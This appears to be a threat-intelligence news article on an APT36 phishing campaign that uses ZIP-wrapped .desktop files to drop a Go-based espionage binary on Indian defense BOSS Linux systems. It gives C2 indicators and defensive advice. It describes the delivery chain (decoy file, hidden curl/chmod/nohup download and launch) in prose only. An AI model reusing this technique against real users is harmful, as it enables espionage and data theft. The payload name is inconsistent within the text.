APT36 Exploits BOSS Linux Systems Using Malicious ZIP Files to Harvest Confidential Information

The Indian defense sector is facing a new wave of targeted cyber espionage as threat intelligence firm CYFIRMA uncovers a sophisticated phishing campaign by the Pakistan-based group APT36, also known as Transparent Tribe.

The campaign represents a marked evolution in adversarial tactics, now targeting Linux platforms, specifically BOSS Linux, the Indian government’s preferred desktop operating system.

Phishing Emails Disguise Malicious Payloads

CYFIRMA’s analysis reveals that APT36 is distributing highly tailored phishing emails to Indian defense personnel.

The emails contain ZIP attachments, each housing a deceptive .desktop shortcut file labeled “Cyber-Security-Advisory.desktop”. Upon launch, this film kicks off a carefully layered attack sequence:

• The malicious .desktop File, disguised with a LibreOffice Impress icon, first downloads a seemingly legitimate PowerPoint file (“slide.pptx”). In reality, the file is an HTML page embedded with an iframe, tricking the user with a fake cybersecurity advisory.
• While the user is distracted by the decoy, a concealed command silently downloads a Linux executable (“BOSS.elf”), which is then made executable and launched in the background using. nohup, ensuring persistence even after the user logs out.

This multi-stage social engineering ploy allows the malware to bypass user suspicion and evade traditional antivirus defenses.

Technical Analysis – Data Theft and Stealth Tactics

The primary payload, “client.elf”, is a Go-based binary engineered for espionage. Once active, it profiles the victim’s system, gathering hostnames, CPU, and memory information, and scanning for files.

It leverages the “github.com/kbinani/screenshot” Go library to capture desktop screenshots, thereby enabling APT36 to harvest sensitive visual information covertly.

The malware establishes a persistent Command and Control (C2) connection to servers linked with the malicious domain “sorlastore.com” and the IP address 101.99.92.182, using non-standard network ports.

By chaining legitimate utilities like curl, chmod, and nohup within the .desktop file, the attackers evade traditional behavior-based detection.

Critically, the campaign’s Indicators of Compromise (IOCs) include specific file hashes, domains, and YARA rules, allowing defenders to update detection systems promptly.

Heightened Security Urged for Indian Defense Sector

CYFIRMA recommends urgent action, including advanced email filtering, disabling automatic execution of unsafe file types, and enhanced user awareness training.

System hardening, such as restricting execution permissions in directories like /tmp and monitoring outbound traffic for C2 communication is crucial.

Organizations should also integrate threat intelligence feeds and deploy endpoint detection tools tailored for Linux environments.

This campaign marks a significant leap in APT36’s capabilities, signaling a growing threat to government and critical infrastructure across India.

Vigilant monitoring and proactive defense remain essential as the adversary shifts its focus to the backbone systems of national security.